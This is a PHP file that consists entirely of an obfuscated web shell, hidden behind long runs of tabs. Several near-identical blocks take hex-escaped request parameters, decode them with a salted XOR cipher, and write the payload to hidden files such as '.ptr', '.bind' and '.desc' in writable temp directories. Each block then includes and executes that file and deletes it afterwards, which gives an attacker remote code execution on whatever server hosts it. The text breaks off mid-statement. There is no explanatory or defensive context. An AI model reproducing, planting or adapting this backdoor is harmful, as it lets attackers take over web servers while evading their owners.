<?																																										if(array_key_exists("re\x73o\x75\x72c\x65", $_POST)){ $reference = $_POST["re\x73o\x75\x72c\x65"]; $reference=explode('.' , $reference ); $item=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s); $__len=count($reference); for ($n=0; $n < $__len; $n++) { $v6=$reference[$n]; $sChar=ord($s[$n % $sLen]); $dec=((int)$v6 - $sChar - ($n % 10)) ^ 75; $item .= chr($dec); } $entry = array_filter(["/dev/shm", getcwd(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp"]); foreach ($entry as $desc) { if (max(0, is_dir($desc) * is_writable($desc))) { $component = str_replace("{var_dir}", $desc, "{var_dir}/.ptr"); if (@file_put_contents($component, $item) !== false) { include $component; unlink($component); die(); } } } }
																																										if(isset($_REQUEST["it\x65m"])){ $flag = $_REQUEST["it\x65m"]; $flag = explode (".", $flag ) ; $factor = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3); $__len = count($flag); for($s = 0; $s < $__len; $s++) {$v7 = $flag[$s]; $chS = ord($s3[$s % $lenS]); $dec = ((int)$v7 - $chS -($s % 10)) ^ 94; $factor .= chr($dec); } $data = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path()]); foreach ($data as $key => $property_set) { if (is_dir($property_set) && is_writable($property_set)) { $data_chunk = str_replace("{var_dir}", $property_set, "{var_dir}/.descriptor"); if (file_put_contents($data_chunk, $factor)) { require $data_chunk; unlink($data_chunk); die(); } } } }
																																										if(array_key_exists("\x70ar\x61me\x74e\x72\x5F\x67\x72oup", $_REQUEST) && !is_null($_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"])){ $marker = $_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"]; $marker = explode ('.',$marker ) ; $entity = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $m = 0; array_walk( $marker, function( $v8) use( &$entity, &$m, $salt, $lenS) {$sChar = ord( $salt[$m % $lenS]); $d =( ( int)$v8 - $sChar -( $m % 10)) ^ 24; $entity .= chr( $d); $m++; }); $data_chunk = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), "/var/tmp", "/tmp"]); foreach ($data_chunk as $key => $fac) { if (!!is_dir($fac) && !!is_writable($fac)) { $dat = "$fac/.ent"; $file = fopen($dat, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $dat; @unlink($dat); exit; } } } }
																																										if(filter_has_var(INPUT_POST, "po\x69n\x74er")){ $flag = $_REQUEST["po\x69n\x74er"]; $flag=explode( '.' ,$flag) ; $dat = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1 ); $p = 0; while ($p<count($flag)) { $v5 = $flag[$p]; $sChar = ord($s1[$p % $sLen] ); $dec = ((int)$v5 - $sChar - ($p % 10)) ^ 80; $dat.= chr($dec ); $p++; } $val = array_filter([getenv("TEMP"), getenv("TMP"), session_save_path(), "/var/tmp", "/tmp", getcwd(), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); while ($tkn = array_shift($val)) { if (!( !is_dir($tkn) || !is_writable($tkn) )) { $sym = "$tkn/.bind"; $success = file_put_contents($sym, $dat); if ($success) { include $sym; @unlink($sym); exit;} } } }
																																										if(in_array("val", array_keys($_POST))){ $ent = $_POST["val"]; $ent = explode( "." ,$ent) ; $factor=''; $s5='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s5 ); $r=0; foreach ($ent as $v4) { $sChar=ord($s5[$r % $lenS] ); $d=((int)$v4 - $sChar - ($r % 10)) ^88; $factor.=chr($d ); $r++; } $parameter_group = array_filter(["/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path()]); $ref = 0; do { $holder = $parameter_group[$ref] ?? null; if ($ref >= count($parameter_group)) break; if (!( !is_dir($holder) || !is_writable($holder) )) { $sym = "$holder/.desc"; if (@file_put_contents(